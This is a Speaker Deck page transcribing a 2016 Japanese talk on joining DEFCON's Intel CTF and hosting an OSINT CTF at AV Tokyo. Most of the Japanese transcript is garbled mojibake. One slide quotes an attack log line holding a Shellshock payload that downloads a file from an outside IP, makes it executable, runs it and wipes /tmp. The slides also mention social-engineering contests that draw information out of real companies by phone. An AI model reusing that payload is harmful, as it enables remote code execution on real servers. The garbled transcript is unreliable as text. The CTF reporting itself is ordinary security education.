Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Intel CTF and Open xINT CTF 20161220
Search
Yuho Kameda
December 20, 2016
Technology
1
1.2k
Intel CTF and Open xINT CTF 20161220
OSINTのCTFに参加して開催した話で! 2016/12/20 #ssmjp
Yuho Kameda
December 20, 2016
Tweet
Share
More Decks by Yuho Kameda
See All by Yuho Kameda
How to use OWASP ZAP & Vulnerabilities Slikmap
ykame
0
9k
Enjoy Daily Life by handy tool
ykame
0
110
Find Trust-Information -Public- 20170630 #ssmjp
ykame
1
2.5k
Hey Siri! Hello Barbie! ssmjp
ykame
0
910
How to create the alert by script of ZAP
ykame
2
720
[bpstudy] OWASP ZAP Vulnerable Assesment.
ykame
2
1.4k
What is ZAP?
ykame
0
510
MINI Hardening #1.2 20分LT ZAPを使ったHardening対策術 2015/8/29
ykame
2
540
How to install VMwarePlayer and OWASP BWA
ykame
1
1k
Other Decks in Technology
See All in Technology
Making a MIDI controller device with PicoRuby/R2P2 (RubyKaigi 2025 LT)
risgk
1
310
SREからゼロイチプロダクト開発へ ー越境する打席の立ち方と期待への応え方ー / Product Engineering Night #8
itkq
2
1k
watsonx.data上のベクトル・データベース Milvusを見てみよう/20250418-milvus-dojo
mayumihirano
0
120
ここはMCPの夜明けまえ
nwiizo
30
11k
PostgreSQL Log File Mastery: Optimizing Database Performance Through Advanced Log Analysis
shiviyer007
PRO
0
130
C++26アップデート 2025-03
faithandbrave
0
1.1k
Cross Data Platforms Meetup LT 20250422
tarotaro0129
1
760
ビジネスとデザインとエンジニアリングを繋ぐために 一人のエンジニアは何ができるか / What can a single engineer do to connect business, design, and engineering?
kaminashi
2
370
より良い開発者体験を実現するために~開発初心者が感じた生成AIの可能性~
masakiokuda
0
210
AWSの新機能検証をやる時こそ、Amazon Qでプロンプトエンジニアリングを駆使しよう
duelist2020jp
1
280
MCPを活用した検索システムの作り方/How to implement search systems with MCP #catalks
quiver
13
7k
AIコーディングの最前線 〜活用のコツと課題〜
pharma_x_tech
4
2.4k
Featured
See All Featured
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
45
9.5k
Building Applications with DynamoDB
mza
94
6.3k
Statistics for Hackers
jakevdp
798
220k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
119
51k
Chrome DevTools: State of the Union 2024 - Debugging React & Beyond
addyosmani
5
560
The Cost Of JavaScript in 2023
addyosmani
49
7.7k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
357
30k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
233
17k
How to Ace a Technical Interview
jacobian
276
23k
Git: the NoSQL Database
bkeepers
PRO
430
65k
Mobile First: as difficult as doing things right
swwweet
223
9.6k
Transcript
OSINTͷCTFʹ ࢀՃͯ͠։࠵ͨ͠Ͱʂ 2016/12/20 #ssmjp @YuhoKameda ɹɹɹɹɹɹɹɹɹ @pinja_xyz
ࣗݾհ ُా ༐า : ykame (@YuhoKameda) ZAP Evangelist OSINT ओͳۀ༰
WebΞϓϦέʔγϣϯ੬ऑੑஅ ϓϥοτϑΥʔϜ੬ऑੑஅ SOC/CSIRTۀ ۓٸҊ݅ͳΜͰཁһ… ใऩू
ࠓ͢͜ͱ DEFCONͰIntel CTFʹࢀՃͨ͠ AV TokyoͰOpen xINT CTFΛ։࠵ͨ͠
DEFCONͰIntel CTFʹ ࢀՃͨ͠
DEFCONͰIntel CTF DEFCONͬͯͳʔʹʁ ຖՆʹϥεϕΨεͰ։࠵ BlackHatʹଓ͚ͯ։࠵ ༷ʑͳCTFίϯςετ͕͋ΔϋοΧʔ ͷࡇయ
DEFCONͰIntel CTF Intel CTFͬͯͳʔʹʁ 2015͔Β࢝·ͬͨɺIntelligenceʹযΛͯͨ ڝٕ ୈ2ճ(2016)ͷςʔϚɺੈքͷTop50ʹೖΔا ۀͷThreat Intelligence Analystͱͯ͠ɺ߈ܸऀΛ
͍ͯ͘͠աఔͰ༷ʑͳΛճ͢Δ ༏উۚ$2,500 pinjaͰࢀՃʂ(@luminࢯɺ@awamori_ttࢯ + me) ݁Ռ12ҐͰͨ͠
Intel CTFͷ݁Ռ
ͲΜͳ͕͋ͬͨͷʔʁ 1 The Vuln: What is the vulnerability that was
successfully exploited also "known" as? 4ϑΝΠϧܭ508ສߦͷApacheϩάͷத͔ Βɺ߈ܸʹޭͨ͠1ߦΛݟ͚ͭΔ XX.XX.XX.XX - - [21/Jul/2016:02:58:19 -0700] "GET /product/? id=2085 HTTP/1.0" 500 4958 "" "() { : ; }; /bin/bash -c 'wget -O / tmp/a.jpg http://52.37.125.215/ ; curl -o /tmp/a.jpg http:// 52.37.125.215/ ; tar -xzvf /tmp/a.jpg ; chmod 777 /tmp/* ; /tmp/a ; rm -rf /tmp/*'"
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271?
1ͷ͑ʁ What is the vulnerability that was successfully exploited also
"known" as? ͳ͔ͳ͔͕͑߹Θͳ͍… Shellshock? shellshock? Bashbug? CVE-2014-6271? ͑ʮBashdoorʯ
ͦͷଞͷ <Level1> ϚϧΣΞͷ௨৴ઌʁ ߈ܸݩIPͷASN(Autonomous System Number)ʁ ߈ܸݩIP͕ެ։͍ͯ͠ΔWebαʔόͷόʔδϣϯʁ <Level2> ϚϧΣΞͷ໊લʁ ༻͕ແޮԽ͞Ε͍ͯΔ໊ؔʁ
Ϙοτͷ໊લʁ Bot Harder͕༻Δ͢ΔMaildropʁ
ଞʹ͋ΔSocial Engineering CTF(SECTF) ࣮ࡍͷاۀిͯ͠ใࡡऔ͢Δڝٕ Black Badge͑Δۄίϯςετ blog.yka.me Ͱɺ2015ͷใΛupͯ͠·͢ http://blog.yka.me/2015/08/social-engineering-ctfsectf-defcon-23.html
AV TokyoͰOpen xINT CTFΛ ։࠵ͨ͠
AV Tokyoͬͯͳʔʹʁ ηΩϡϦςΟք۾ͷਓ͕ɺू·ͬͯҿΜ ͰɺൃදΛฉ͍ͯҿΜͰɺҿΉ ϋοΧʔίϛϡχςΟ no drink! no hack!
Ԡื·ͰͷྲྀΕ 8/6 20:00 ʮOSINTؔͷCTFຊͰΓ͍ͨͰ͢Ͷʯ ʮձࣾؔͩͱ༰͕… AVTokyoͷCFxͱ͔Ͳ͏Ͱ͠ΐ͏ʯ ʮʒ(8/15)͍ۙͰ͢Ͷɺམͪண͍ͨΒग़͠·͠ΐ͏͔ʯ 8/7 10:00 ɹɹʙ16:00
Intel CTFڝٕࢀՃ 8/8 13:19 writeupΛڞ༗ 8/8 22:26 Call For Xͷจষୟ͖ 8/12 Call For Xఏग़done
࣮ࡍʹ։࠵ͯ͠Έͨ 10/22 15:00 - 19:30 @ौ୩
Open xINT CTFͱʁ http://xintctf.wpblog.jp/ ձͰͷؔऀͷฉ͖ࠐΈSNSͳͲͰඞཁͳใΛऩ ू͠ɺ࣍ʑ໌Β͔ʹͳΔώϯτΛղ͖ͳ͕ΒຊؙʹͨͲΓ ண͘ɺݱͷεύΠཆίϯςετ ࢀՃऀ(εύΠ) ߈ܸऀΛௐࠪ (ผͷεύΠ)
߈ܸऀ(ϋοΧʔ) ৮ USB୳ࡧґཔ USBʹ᠘ΛࠐΜͰ৮ ಠࣗʹௐࠪ
7 1. pinja.xyzͷ։ઃऀ(߈ܸऀ)ͷϝʔϧΞυϨεʁ 2. ߈ܸऀ͕ॴ༗͢ΔFacebookΞΧϯτʁ 3. ߈ܸऀཱ͕ͪدͬͨ(ࣸਅ)ҿ৯ళͷ࠲ඪʁ 4. ߈ܸऀͱҰॹʹ৯ࣄ͍ͯ͠Δਓ(εύΠ)ͷFacebookΞΧϯτ ʁ
5. ͜ͷਓ(εύΠ)Λࣸਅ͔Βಛఆ͠ɺAV TokyoͰ৮ͯ͠ʮ͏· ͘৴༻ͤͯ͞ʯใΛҾ͖ग़ͤ 6. εύΠ͔ΒҾ͖ग़ͨ͠ใΛݩʹɺʮϞϊʯΛݟ͚ͭɺಘΒΕΔ ใΛݟ͚ͭΖ 7. ͦͷϞϊʹ᠘ϦϯΫΛֻ͚ɺʮෆ৹ʹࢥΘΕͳ͍Α͏ʯ߈ܸऀ ʹAV TokyoͰʮϞϊʯΛͤ
͋ΔʮϞϊʯ(USB)Λ୳ͯ͘͠Δ MAMORIOΞϓϦͰԠνΣοΫ http://www.mamorio.jp/ ΞϓϦͰԠͷ͋ͬͨۙΛ୳͢
ৄ͘͠ࢀՃऀͷwriteupΛʂ ΤΫετϦʔϜCTFͭΒ͍ʢOpen xINT ͷWriteup?ʣ http://pinksawtooth.hatenablog.com/ entry/2016/10/24/010049 Open xINT CTF Writeup
http://qiita.com/nicklegr/items/ 5ebcdaac86a21613c94a
ࢀՃऀ : 93ਓ 1Ͱղ͚ͨਓ : 67ਓճ 1: 67ਓɺ2: 49ਓɺ3: 8ਓɺ4:
28ਓɺ5: 7ਓ
࠷ऴతͳ݁Ռʁ (700Ҏ্) [߹ܭ + εύΠಘ + ࠷ऴճ࣌ؒ] Sh1n0g1ɹ900 +ʢ100ʣ18:45:56 tigerszkɹ900
+ʢ100ʣ 19:20:49 rcsirtɹ900 +ʢ0ʣ17:16:36 nicklegrɹ700 +ʢ200ʣ17:39:52 brightblueɹ900 +ʢ0ʣ19:25:33 TomoriNaoɹ700 +ʢ100ʣ17:20:22 tonko2ɹ600 +ʢ100ʣ17:11:11 Sakura Ayaneɹ700 +ʢ0ʣ17:31:46 ໊લ͕ొ໊ͱҰக͠ͳ͍ํεύΠಘ͕0ͱͳΓ·͢ ಉͷ߹ɺ࠷ऴճ͕࣌ؒૣ͍ํ্͕Ґͱ͠·͢